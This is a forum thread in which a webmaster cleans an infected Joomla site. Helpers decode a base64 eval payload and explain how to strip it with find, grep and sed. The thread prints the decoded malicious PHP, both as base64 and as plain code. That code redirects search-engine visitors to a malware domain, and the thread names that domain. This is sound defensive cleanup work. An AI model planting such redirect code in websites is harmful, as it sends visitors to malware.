Find and replace command

Forum rules
Before you post please read this

Find and replace command

Postby livicrew on Thu Jan 05, 2012 9:41 am

Hi guys,

Recently I needed to clean up hacked code on my webserver, I used the following to find the base64 coding

Code: Select all
find . -type f -name "*.php" -exec grep -H "eval(base64decode)DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokbmNjdj1oZWFkZXJzX3NlbnQoKTsNCmlmICghJG5jY3Ypew0KJHJlZmVyZXI9JF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddOw0KJHVhPSRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImdvb2dsZSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ5YW5kZXgucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibWFpbC5ydSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImFzay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJtc24iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlIikpIHsNCglpZiAoIXN0cmlzdHIoJHJlZmVyZXIsImNhY2hlIikgb3IgIXN0cmlzdHIoJHJlZmVyZXIsImludXJsIikpewkJDQoJCWhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9uZXd5cmZocmguYmlqLnBsLyIpOw0KCQlleGl0KCk7DQoJfQ0KfQ0KfQ==" {} \; > potentially_infected_files.txt

This gave me a list of infected files, I then manually deleted the scripting.

How could I use this command (or SED) to find the code in every file on the server and then replace it with a space?

Possibly a script I can run manually when I am suspicious of a compromisation.
Any help would be much appreciated.
livicrew
Level 1
Level 1
 
Posts: 4
Joined: Thu Jan 05, 2012 9:31 am

Linux Mint is funded by ads and donations.
 

Re: Find and replace command

Postby Habitual on Thu Jan 05, 2012 9:45 am

Code: Select all
find -name "*.php" -type f -exec sed -i 's/<?php \/**\/ eval(base64_decode("DQplcn.*?>//g' {}\;


should remove them/it.

YMMV. Make backups.
My DorkBlog
Cirrhus9.com - Managed HA VDSs and Scalable grid solutions.
User avatar
Habitual
Level 7
Level 7
 
Posts: 1926
Joined: Sun Nov 21, 2010 8:31 pm
Location: Under the hood

Re: Find and replace command

Postby Habitual on Thu Jan 05, 2012 9:48 am

BTW:

That reads
Code: Select all
$nccv=headers_sent();
if (!$nccv){
$referer=$_SERVER['HTTP_REFERER'];
$ua=$_SERVER['HTTP_USER_AGENT'];
if (stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing") or stristr($referer,"yandex.ru") or stristr($referer,"rambler.ru") or stristr($referer,"mail.ru") or stristr($referer,"ask.com") or stristr($referer,"msn") or stristr($referer,"live")) {
   if (!stristr($referer,"cache") or !stristr($referer,"inurl")){      
      header("Location: http://newyrfhrh.bij.pl/");
      exit();
   }
}
}


which comes from
Code: Select all
echo <long_string_after_'"eval(base64decode)" | base64 -d
My DorkBlog
Cirrhus9.com - Managed HA VDSs and Scalable grid solutions.
User avatar
Habitual
Level 7
Level 7
 
Posts: 1926
Joined: Sun Nov 21, 2010 8:31 pm
Location: Under the hood

Re: Find and replace command

Postby livicrew on Thu Jan 05, 2012 10:05 am

Thanks for that, I will make very good use of it.

How did you 'read' the file ?? Also, can I find the password he used in his script?

I read this and the guy managed to read the password blog.kejsarmakten.se/all/software/2011/01/14/malware-in-joomla.html This was the exact hack I had.

This would be useful, as I could delete every backdoor onto my website using his script.

Thanks again

Peter
livicrew
Level 1
Level 1
 
Posts: 4
Joined: Thu Jan 05, 2012 9:31 am

Re: Find and replace command

Postby Habitual on Thu Jan 05, 2012 10:24 am

Peter:

So you are running Joomla?
You do realize that all PHP scripts are now suspect?
This is shared hosting or not?

I 'found' it with terminal >
Code: Select all
echo DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokbmNjdj1oZWFkZXJzX3NlbnQoKTsNCmlmICghJG5jY3Ypew0KJHJlZmVyZXI9JF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddOw0KJHVhPSRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImdvb2dsZSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ5YW5kZXgucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibWFpbC5ydSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImFzay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJtc24iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlIikpIHsNCglpZiAoIXN0cmlzdHIoJHJlZmVyZXIsImNhY2hlIikgb3IgIXN0cmlzdHIoJHJlZmVyZXIsImludXJsIikpewkJDQoJCWhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9uZXd5cmZocmguYmlqLnBsLyIpOw0KCQlleGl0KCk7DQoJfQ0KfQ0KfQ== | base64 -d


Password...? It's a common redirect that says "you're going to visit http://newyrfhrh.bij.pl/ "if you come from {list_of_referrers]
"It took us a long time to notice the attack since the only visible change they made to the website was to redirect google searches from our website to malware websites in Poland."
This is a first step in many attacks but it is actually the Symptom of a hack. What does
Code: Select all
find `pwd` . -name z.php -exec less {} \;
show us?
The password is usually hard-coded in php file somewhere (in clear or obfuscated text).

Is http://blog.kejsarmakten.se/all/softwar ... oomla.html your article?

Tighten up Joomla if you run it and never run joomla if you don't.
More holes than a Microsoft Product IMO.
Only thing worse is telnet.

Joomla gallery components are a popular target.

I learned 80% of this by extensive reading at
http://blog.unmaskparasites.com/ and
http://25yearsofprogramming.com/blog/

Lemme know...

Subscribed with interest...

JJ
My DorkBlog
Cirrhus9.com - Managed HA VDSs and Scalable grid solutions.
User avatar
Habitual
Level 7
Level 7
 
Posts: 1926
Joined: Sun Nov 21, 2010 8:31 pm
Location: Under the hood

Re: Find and replace command

Postby livicrew on Thu Jan 05, 2012 10:29 am

Hi

It's not my article, I found it while working on my hack on my joomla website. It appears the com_oziogallery had a backdoor, I have removed ozio. Also I use coppermine galleries which also had/has a backdoor, I have the latest version, but still not sure how secure it is.

I am on shared hosting.
livicrew
Level 1
Level 1
 
Posts: 4
Joined: Thu Jan 05, 2012 9:31 am

Re: Find and replace command

Postby Habitual on Thu Jan 05, 2012 10:38 am

Peter:

livicrew wrote:... Also, can I find the password he used in his script?


Terminal >
Code: Select all
find `pwd` . -type f -name "*.php" -exec grep $auth_pass {} \;


IF you get a "63a9f0ea7bb98050796b649e85481845" in the output/string, the password is "root" (no quotes)

livicrew wrote:...as I could delete every backdoor onto my website using his script.

Without better Joomla security, it will just come right back.

All Files except .cgi should be 644
All directories should be 755

Shared hosting. Ugh.

Should you decide that you need a more in-depth investigation and solution, send me a PM with your everyday email address and we can continue discussing your Security and/or remedy.

JJ
My DorkBlog
Cirrhus9.com - Managed HA VDSs and Scalable grid solutions.
User avatar
Habitual
Level 7
Level 7
 
Posts: 1926
Joined: Sun Nov 21, 2010 8:31 pm
Location: Under the hood

Re: Find and replace command

Postby Habitual on Thu Jan 05, 2012 10:43 am

Peter:

livicrew wrote:...It appears the com_oziogallery had a backdoor, I have removed ozio. Also I use coppermine galleries which also had/has a backdoor, I have the latest version, but still not sure how secure it is.


Got backup?
My DorkBlog
Cirrhus9.com - Managed HA VDSs and Scalable grid solutions.
User avatar
Habitual
Level 7
Level 7
 
Posts: 1926
Joined: Sun Nov 21, 2010 8:31 pm
Location: Under the hood

Re: Find and replace command

Postby livicrew on Thu Jan 05, 2012 10:57 am

Thanks for that. I will keep my eye on it and if I need help, I will give you a shout.

Maybe I should go back to a 'normal' website and drop Joomla !
livicrew
Level 1
Level 1
 
Posts: 4
Joined: Thu Jan 05, 2012 9:31 am

Re: Find and replace command

Postby Habitual on Thu Jan 05, 2012 11:26 am

Peter:

Check your PMs...
My DorkBlog
Cirrhus9.com - Managed HA VDSs and Scalable grid solutions.
User avatar
Habitual
Level 7
Level 7
 
Posts: 1926
Joined: Sun Nov 21, 2010 8:31 pm
Location: Under the hood

Linux Mint is funded by ads and donations.
 

Return to Scripts & Bash

Who is online

Users browsing this forum: No registered users and 2 guests